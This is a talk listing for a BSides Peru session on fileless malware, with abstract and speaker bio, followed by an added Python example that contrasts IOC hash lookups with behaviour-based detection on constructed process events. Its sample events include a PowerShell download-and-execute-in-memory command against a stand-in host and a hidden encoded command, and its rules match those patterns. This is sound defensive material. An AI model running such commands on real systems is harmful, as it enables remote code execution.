Fileless malware - Jim Van De Ryt

BSides Peru · 25:53 · 113 views · Published 2018-06
About this talk
Abstract: In 2017, over half of all malware was file-less malware. As cyber threat adversaries evolve, so do their methods. Today, file-less malware is more prevalent in organizations' environments than file-based malware, because file-based malware can be detected and blocked with current security controls: it leaves artifacts known as Indicators of Compromise (IOCs). To get around this, cyber threat adversaries had to find a way to complete their malicious operations without being detected by current controls. Since file-less malware leaves almost no artifacts, there can be no threat detection or threat hunt based on Indicators of Compromise, because no IOCs exist. Instead, the Tactics, Techniques and Procedures (TTPs) that cyber threat adversaries use are the way to detect modern attack scenarios.

Bio: Jim VanDeRyt has worked in information security for the past 17 years. Jim spent almost 7 years at Internet Security Systems, where he learned network security such as intrusion prevention systems, vulnerability management and some host-based protection. Next, Jim spent two and a half years with a reseller learning various security technologies such as data loss prevention, wireless planning and security, firewalls, network access control, host and file encryption, and some database security and application security. Prior to Cybereason, Jim was at Imperva for four and a half years, where he learned about securing structured business data, which usually resides in databases and is usually accessed by web applications in most customers' environments today. After Imperva, Jim worked at Fidelis CyberSecurity for three and a half years, where he learned about advanced threat detection and prevention on the network.
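The abstract's central point, that an IOC lookup has nothing to match when no file is dropped while a TTP rule still fires on behaviour, is illustrated below with an added example that is not part of the talk or its slides. The process-creation events, the hash on the IOC list and the three behavioural rules (script host spawned by an office application, encoded PowerShell command line, download-and-execute in memory) are all constructed for this illustration; the rules are commonly used heuristics and are assumptions here, not anything the talk enumerates.

```python
# Added example (not from the talk): contrasting an IOC hash lookup with
# TTP-based rules on constructed Windows process-creation events.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcessEvent:
    pid: int
    image: str                        # path of the started executable
    parent_image: str                 # path of the parent process
    command_line: str
    dropped_file_hash: Optional[str]  # hash of a payload written to disk; None if nothing was dropped


# Constructed IOC list: one made-up hash standing in for a known-bad binary.
KNOWN_BAD_HASHES = {"0" * 63 + "1"}

# Assumed behavioural rule inputs (heuristics, not the talk's own list).
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
IN_MEMORY_RE = re.compile(r"downloadstring|invoke-expression|\biex\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ioc_match(event: ProcessEvent) -> bool:
    """Artifact-based check: fires only when a dropped file hashes to a known IOC."""
    return event.dropped_file_hash is not None and event.dropped_file_hash in KNOWN_BAD_HASHES


def ttp_findings(event: ProcessEvent) -> List[str]:
    """Behaviour-based checks that need no file artifact at all."""
    findings = []
    image = basename(event.image)
    parent = basename(event.parent_image)
    tokens = {t.lower() for t in event.command_line.split()}

    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("script host spawned by office application")
    if image == "powershell.exe" and tokens & ENCODED_FLAGS:
        findings.append("encoded powershell command line")
    if image in SCRIPT_HOSTS and IN_MEMORY_RE.search(event.command_line):
        findings.append("download-and-execute in memory")
    return findings


def triage(events: List[ProcessEvent]) -> Dict[int, dict]:
    """Run both detection styles over every event, keyed by pid."""
    return {e.pid: {"ioc": ioc_match(e), "ttps": ttp_findings(e)} for e in events}


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events (not real telemetry); the base64 blob is filler.
EVENTS = [
    # File-based: a dropped executable whose hash is on the IOC list.
    ProcessEvent(101, r"C:\Users\a\AppData\Local\Temp\update.exe", EXPLORER,
                 "update.exe", "0" * 63 + "1"),
    # Fileless: Word spawns PowerShell with an encoded command; nothing on disk.
    ProcessEvent(102, PS_EXE, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 "powershell.exe -NoP -W Hidden -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA=", None),
    # Fileless: script host fetches and evaluates code in memory.
    ProcessEvent(103, PS_EXE, EXPLORER,
                 "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"", None),
    # Benign: an administrator runs a script from a file.
    ProcessEvent(104, PS_EXE, EXPLORER, "powershell.exe -File C:\\scripts\\backup.ps1", None),
]

if __name__ == "__main__":
    for pid, result in triage(EVENTS).items():
        print(pid, result)
```

Running the block shows the split the abstract describes: event 101 is caught only by the IOC lookup, events 102 and 103 are caught only by the TTP rules, and the benign event 104 triggers neither. In a real pipeline the rules would be tuned against the organization's own baseline of script-host usage to keep false positives manageable.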